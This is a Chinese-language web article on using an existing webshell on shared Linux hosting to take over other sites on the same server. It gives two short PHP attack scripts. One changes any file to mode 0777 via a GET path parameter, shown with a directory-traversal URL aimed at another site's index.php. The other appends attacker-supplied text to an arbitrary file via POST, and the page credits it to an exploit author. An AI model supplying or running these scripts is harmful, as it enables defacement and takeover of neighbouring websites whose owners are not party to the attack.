服务器技术

 首页 > 服务器技术 > Linux > linux下用webshell对文件权限的修改 - Linux操作系统

linux下用webshell对文件权限的修改 - Linux操作系统

分享到:
【字体:
导读:
          当我们拥有了一个linux下的shell(服务器上多个网站)。 这个shell对所在站点的根目录有可写入权限,甚至能查看其他网站的目录。 那么,这样的主机设置肯定是不安全的。 有的时候,...

当我们拥有了一个linux下的shell(服务器上多个网站)。
这个shell对所在站点的根目录有可写入权限,甚至能查看其他网站的目录。
那么,这样的主机设置肯定是不安全的。
有的时候,我们想对获得同服务器的其他站的权限,比如直接对其他站点的index.php进行修改,却发现没有权限。
我们可以尝试通过以下脚本来实现对其他站点的文件添加权限。
代码:
$path = stripslashes($_GET['path']);
$ok = chmod ($path , 0777);
if ($ok == true)
echo " CHMOD OK , Permission editable file or directory. Permission to write";
?>
保存为chmod.PHP
使用方法简单,访问
http://site/chmod.php?path=../../其他站点的目录/index.php
这里的index.PHP是要修改权限的文件。
另外一个exploit:
把下面的代码保存为exploit.PHP
代码:
         @$filename = stripslashes($_POST['filename']);
         @$mess = stripslashes($_POST['mess']);   
     $fp = @fopen("{$_POST['filename']}", 'a');
         @fputs($fp,"$mess
");
         @fclose($fp);
?> 




CODE :









Changing CHMOD Permissions Exploit - Contact : the_gl4di4t0r[AT]hotmail[DOT]com



      上一篇:全面介绍linux 常用命令(一) - Linux操作系统:Ubu 下一篇:关于Linux操作系统“暴力破解”软件介绍 - Linux操
    分享到:
    关于Linux操作系统“暴力破解”软件介绍 ...
      在用电脑时,常常会与一些加密的文档打交道,如Zip、Rar甚至PDF文档。 有时我们忘记了文档的密码,就不得不采用“暴力破解”的方法。那么Linux下有没有相关的软件呢。当然有,本文介绍了三款Linux下的暴力破解软件。 Linux环境以Ubuntu 7.10为例,下述三款软件,均包含在Ubuntu源里,可直接apt-get install...
    系统遭受入侵后使用TCT进行紧急恢复并分...
     从事系统管理工作,就算你非常小心翼翼地做好了一切防护,还是可能有入侵者能够突破你  的防护进入系统,并且更改或者删除一些文件。这里,我们借用honeynet project里面的一些实  例,来对一个unix下的实用工具软件tct及其相关辅助软件做简要说明。并且在最后再介绍另外  一个比较不错的能恢复ext2文件系统的软件reco...
    •         php迷,一个php技术的分享社区,专属您自己的技术摘抄本、收藏夹。
    • 在这里……